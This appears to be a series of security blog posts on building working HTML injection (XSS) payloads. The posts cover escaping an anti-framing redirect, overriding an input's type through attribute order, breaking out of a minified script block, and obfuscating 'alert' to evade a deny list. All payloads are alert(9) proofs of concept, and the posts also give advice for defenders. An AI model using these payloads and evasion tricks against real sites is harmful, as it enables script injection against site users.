-
It is on occasion necessary to persuade a developer that an HTML injection vuln capitulates to exploitation notwithstanding the presence within of a redirect that conducts the browser away from the exploit’s embodied
alert()
. Sometimes, parsing an expression takes more effort that breaking it.Turn your attention from defeat to the few minutes of creativity required to adjust an unproven injection into a working one. Here’s the URL we start with:
https://redacted/UnknownError.aspx?id="onmouseover=alert(9);a="
The page reflects the value of this
id
parameter within anhref
attribute. There’s nothing remarkable about this payload or how it appears in the page. At least, not at first:<a href="mailto:support@redacted?subject=error ref: "onmouseover=alert(9);a=""> support@redacted </a>
Yet the browser goes into an infinite redirect loop without ever launching the
alert
. We explore the page a bit more to discover some anti-framing JavaScript where our URL shows up. (Bizarrely, the anti-framing JavaScript shows up almost 300 lines into the<body>
element – well after several other JavaScript functions and page content. It should have been present in the<head>
. It’s like the developers knew they should do something about clickjacking, heard about atop.location
trick, and decided to randomly sprinkle some code in the page. It would have been simpler and more secure to add an X-Frame-Options header.)<script> if (window.top.location != 'https://redacted/UnknownError.aspx?id="onmouseover=alert(9);a="') { window.top.location.href = 'https://redacted/UnknownError.aspx?id="onmouseover=alert(9);a="'; } </script>
The URL in your browser bar may look exactly like the URL in the inequality test. However, the
location.href
property contains the URL-encoded (a.k.a. percent encoded) version of the string, which causes the condition to resolve to true, which in turn causes the browser to redirect to the newlocation.href
. As such, the following two strings are not identical:https://redacted/UnknownError.aspx?id=%22onmouseover=alert(9);a=%22 https://redacted/UnknownError.aspx?id="onmouseover=alert(9);a="
Since the anti-framing triggers before the browser encounters the affected
href
, theonmouseover
payload (or any other payload inserted in the tag) won’t trigger.This isn’t a problem. Just redirect your
onhack
event from thehref
to theif
statement. This step requires a little bit of creativity because we’d like the conditional to ultimately resolve false to prevent the browser from being redirected. It makes the exploit more obvious.JavaScript syntax provides dozens of options for modifying this statement. We’ll choose concatenation to execute the
alert()
and a Boolean operator to force a false outcome.The new payload is
'+alert(9)&&null=='
Which results in this:
<script> if (window.top.location != 'https://redacted/UnknownError.aspx?id='+alert(9)&&null=='') { window.top.location.href = 'https://redacted/UnknownError.aspx?id='+alert(9)&&null==''; } </script>
Note that we could have used other operators to glue the
alert()
to its preceding string. Any arithmetic operator would have worked.We used innocuous characters to make the statement false. Ampersands and equal signs are familiar characters within URLs. But we could have tried any number of alternates. Perhaps the presence of “null” might flag the URL as a SQL injection attempt. We wouldn’t want to be defeated by a lucky WAF rule. All of the following alternate tests return false:
undefined == '' [] != '' [] === ''
This example demonstrated yet another reason to pay attention to the details of an HTML injection vuln. The page reflected a URL parameter in two locations with execution different contexts. From the attacker’s perspective, we’d have to resort to intrinsic events or injecting new tags (e.g.
<script>
) after thehref
, but theif
statement drops us right into a JavaScript context. From the defender’s perspective, we should have at the very least used an appropriate encoding on the string before writing it to the page – URL encoding would have been a logical step.• • • -
Try parsing a web page some time. If you’re lucky, it’ll be “correct” HTML without too many typos. You might get away with using some regexes to accomplish this, but be prepared for complex elements and attributes. And good luck dealing with code inside
<script>
tags.Sometimes there’s a long journey between seeing the potential for HTML injection in a few reflected characters and crafting a successful exploit that bypasses validation filters and evades output encoding. Sometimes it’s necessary to explore the dusty passages of shrines to parsing standards in search of a hidden door that reveals an exploit path.
HTML is messy. The history of HTML even more so. Browsers struggled for two decades with badly written markup, typos, quirks, mis-nested tags, and misguided solutions like XHTML. And they’ve always struggled with sites that are vulnerable to HTML injection.
Every so often, it’s the hackers who struggle with getting an HTML injection attack to work. Here’s a common scenario in which some part of a URL is reflected within the value of an hidden
input
field. In the following example, note that the quotation mark has not been filtered or encoded.https://web.site/search?sortOn=x"
<input type="hidden" name="sortOn" value="x"">
If the site doesn’t strip or encode angle brackets, then it’s trivial to craft an exploit. In the next example we’ve even tried to be careful about avoiding dangling brackets by including a
<z"
sequence to consume it. A<z>
tag with an empty attribute is harmless.https://web.site/search?sortOn=x"><script>alert(9)</script><z"
<input type="hidden" name="sortOn" value="x"><script>alert(9)</script><z"">
Now, let’s make this scenario trickier by forbidding angle brackets. If this were another type of input field, we’d resort to intrinsic events.
<input type="hidden" name="sortOn" value="x"onmouseover=alert(9)//">
Or, taking advantage of new HTML5 events, we’d use the
onfocus
event to execute the JavaScript rather than wait for a mouseover.<input type="hidden" name="sortOn" value="x"autofocus/onfocus=alert(9)//">
The catch here is that the hidden
input
type doesn’t receive those events and therefore won’t trigger thealert
. But it’s not yet time to give up. We could work on a theory that changing theinput
type would enable the field to receive these events.<input type="hidden" name="sortOn" value="x"type="text"autofocus/onfocus=alert(9)//">
Fortunately, modern browsers won’t fall for this. And we have HTML5 to thank for it. Section 8 of the spec codifies the HTML syntax for all browsers that wish to parse it. From the spec, 8.1.2.3 Attributes:
There must never be two or more attributes on the same start tag whose names are an ASCII case-insensitive match for each other.
Okay, we have a constraint, but no instructions on how to handle this error condition. Without further instructions, it’s not clear how a browser should handle multiple attribute names. Ambiguity leads to security problems – it’s to be avoided at all costs.
From the spec, 8.2.4.35 Attribute name state:
When the user agent leaves the attribute name state (and before emitting the tag token, if appropriate), the complete attribute’s name must be compared to the other attributes on the same token; if there is already an attribute on the token with the exact same name, then this is a parse error and the new attribute must be dropped, along with the value that gets associated with it (if any).
So, we’ll never be able to fool a browser by “casting” the
input
field to a different type with a subsequent attribute. Well, almost never. Notice the subtle qualifier: subsequent.(The messy history of HTML continues unabated by the optimism of a version number. The HTML Living Standard defines parsing rules in HTML Living Standard section 12. It remains to be seen how browsers handle the interplay between HTML5 and the Living Standard, and whether they avoid the conflicting implementations that led to quirks of the past.)
Think back to our injection example. Imagine the order of attributes were different for the vulnerable
input
tag, with the name and value appearing before the type. In this case our “type cast” succeeds because the first type attribute is the one we’ve injected.<input name="sortOn" value="x"type="text"autofocus/onfocus=alert(9)//" type="hidden" >
HTML5 design specs only get us so far before they fall under the weight of developer errors. The HTML Syntax rules aren’t a countermeasure for HTML injection. However, the presence of clear (at least compared to previous specs), standard rules shared by all browsers improves security by removing a lot of surprise from browsers’ behaviors.
Unexpected behavior hides many security flaws from careless developers. Dan Geer addresses the challenge of dealing with the unexpected in his working definition of security as “the absence of unmitigatable surprise”.
Look for flaws in modern browsers where this trick works, e.g. maybe a compatibility mode or not using an explicit
<!doctype html>
weakens the browser’s parsing algorithm. With luck, most of the problems you discover will be implementation errors fixbale within the affected browser rather than a design weakness in the spec.HTML5 gives us a better design that minimizes parsing-based security problems. It’s up to web developers to give us better sites that maximize the security of our data.
• • • -
Should you find yourself sitting in a tin can, far above the world, it’s reasonable to feel like there’s nothing you can do. Stare out the window and remark that planet earth is blue.
Should you find yourself writing a web app, with security out of this world, then it’s reasonable to feel like there’s something you forgot to do.
Here’s a web app that seems secure against HTML injection. Yet with a little creativity it’s exploitable – just tell the browser what it wants to know. Like our distant Major Tom – the papers want to know whose shirts you wear.
Every countdown to an HTML injection exploit begins with a probe. Here’s a simple one:
https://web.site/s/ref=page?node="autofocus/onfocus=alert(9);//&search-alias=something
The site responds with a classic reflection inside an
<input>
field. However, it foils the attack by HTML encoding the quotation mark. After several attempts, we have to admit there’s no way to escape the quoted string:<input type="hidden" name="url" value="https://web.site/s/ref=page?node="autofocus/onfocus=alert(9);//&search-alias=something">
Time to move on, but only from that particular payload. Diligence and attention to detail pays off. They’re a common them around here.
Prior to mutating URL parameters, the original link looked like this:
https://web.site/s/ref=page?node=412603031&search-alias=something
One behavior that stood out for this page was the reflection of several URL parameters within a JavaScript block. In the original page, the JavaScript was minified and condensed to a single line. We’ll show the affected
<script>
block with whitespace added in order to more easily understand its semantics. Notice the appearance of the value412603031
from thenode
parameter:(function(w,d,e,o){ var i='DAaba0'; if(w.uDA=w.ues&&w.uet&&w.uex){ues('wb',i,1);uet('bb',i)} siteJQ.available('search-js-general', function(){ SPUtils.afterEvent('spATFEvent', function(){ o=w.DA; if(!o){ o=w.DA=[];e=d.createElement('script'); e.src='https://web.site/a.js'; d.getElementsByTagName('head')[0].appendChild(e) } o.push({c:904,a:'site=redacted;pt=Search;pid=412603031',w:728,h:90,d:768,f:1,g:''}) }) }) })(window,document)
Basically, it’s an anonymous function that takes four parameters, two of which are evidently the
window
anddocument
objects since those show up in the calling arguments. If you’re having trouble conceptualizing the previous JavaScript, consider this reduced version:(function(w,d,e,o){ var i='DAaba0'; o=w.DA; if(!o){ o=w.DA=[] } o.push({c:904,a:'site=redacted;pid=XSS'}) })(window,document)
We need to refine the payload for the
XSS
characters in order to execute arbitrary JavaScript.First we add sufficient syntax to terminate the preceding tokens like function declaration and methods. This is as straightforward as counting parentheses and such. For example, the following gets us to a point where the JavaScript engine parses correctly up to the point of the
XSS
payload.(function(w,d,e,o){ var i='DAaba0'; o=w.DA; if(!o){ o=w.DA=[] } o.push({c:904,a:'site=redacted;pid='}) });XSS'}) })(window,document)
Notice in the previous example that we’ve closed the anonymous function, but there’s no need to execute it. This is the difference between
(function(){})()
and(function(){})
– we omitted the final()
since we’re trying to avoid parsing or execution errors preceding our payload.Next, we find a payload that’s appropriate for the injection context. The reflection point is already within a JavaScript execution block. Thus, there’s no need to use a payload with
<script>
tags, nor do we need to rely on an intrinsic event likeonfocus()
.The simplest payload in this case would be
alert(9)
. However, it appears the site might be rejecting any payload with the word “alert” in it. No problem, we’ll turn to a trivial obfuscation method:window['a'+'lert'](9)
Since we’re trying to cram several concepts into this tutorial, we’ll wrap the payload inside its own anonymous function. Incidentally, this kind of syntax has the potential to horribly confuse regular expressions with which a developer intended to match balanced parentheses.
(function(){window['a'+'lert'](9)})()
Recall that in the original site all of the JavaScript was condensed to a single line. This makes it easy for us to clean up the remaining tokens to ensure the browser doesn’t complain about any subsequent parsing errors. Otherwise, the contents of the JavaScript block may not be executed. Therefore, we’ll try throwing in an opening comment delimiter, like this:
(function(){window['a'+'lert'](9)})()/\*
Oops. The payload fails. In fact, this was where one review of the vuln stopped. The payload never got so complicated as using the obfuscated alert, but it did include the trailing comment delimiter. Since the browser never executed any pop-ups, everyone gave up and called this a false positive. Oops.
Hackers can be as fallible as the developers that give us these nice vulns to chew on.
Take a look at the browser’s ever-informative error console. It tells us exactly what went wrong:
SyntaxError: Multiline comment was not closed properly
Everything following the payload falls on a single line. So, we really should have just used the single line comment delimiter:
(function(){window['a'+'lert'](9)})()//
And we’re done!
(For extra points, try figuring out what the syntax might need to be if the JavaScript spanned multiple lines. Hint: This all started with an anonymous function.)
Here’s the whole payload inside the URL. Make sure to encode the plus operator as %2b – otherwise it’ll be misinterpreted as a space.
https://web.site/s/ref=page?node='})});(function(){window['a'%2b'lert'](9)})()//&search-alias=something
And here’s the result within the
<script>
block.(function(w,d,e,o){ ... o.push({c:904,a:'site=redacted;pid='}) });(function(){window['a'+'lert'](9)})()//'})})(window,document)
There are a few points to review in this example, starting with hints for discovering and exploiting HTML injection:
- Inspect the entire page for areas where a URL parameter name or value is reflected. Don’t stop at the first instance.
- Use a payload appropriate for the reflection context. In this case, we could use JavaScript because the reflection appeared within a
<script>
element. - Write clean payloads. Terminate preceding tokens, comment out (or correctly open) subsequent tokens. Pay attention to messages reported in the browser’s error console.
- Don’t be foiled by sites that put
alert
or other strings on a deny list. Effective attacks don’t even need to use analert()
function. Know simple obfuscation techniques to bypass deny lists. (Obfuscation really just means an awareness of JavaScript’s objects, methods, and semantics plus creativity.) - Use the JavaScript that’s already present. Most sites already have a library like jQuery loaded. Take advantage of
$()
to create new and exciting elements within the page.
And here are a few hints for preventing this kind of flaw:
- Use an encoding mechanism appropriate to the context where data from the client will be displayed. The site correctly used HTML encoding for
"
characters within thevalue
attribute of an<input>
tag, but forgot about dealing with the same value when it was inserted into a JavaScript context. - Use string concatenation at your peril. Create helper functions that are harder to misuse.
- When you find one instance of a programming mistake, search the entire code base for other instances – it’s quicker than waiting for another exploit to appear.
- Accept that a deny list with
alert
won’t provide any benefit. Have an idea of how diverse HTML injection payloads can be.
There’s nothing really odd about JavaScript syntax. It’s a flexible language with several ways of concatenating strings, casting types, and executing methods. We know developers can build sophisticated libraries with JavaScript. We know hackers can build sophisticated exploits with it.
We know Major Tom’s a junkie, strung out in Heaven’s high, hitting an all-time low. Have fun finding and fixing HTML injection vulns – I’m happy to do so. Hope you’re happy, too.
• • •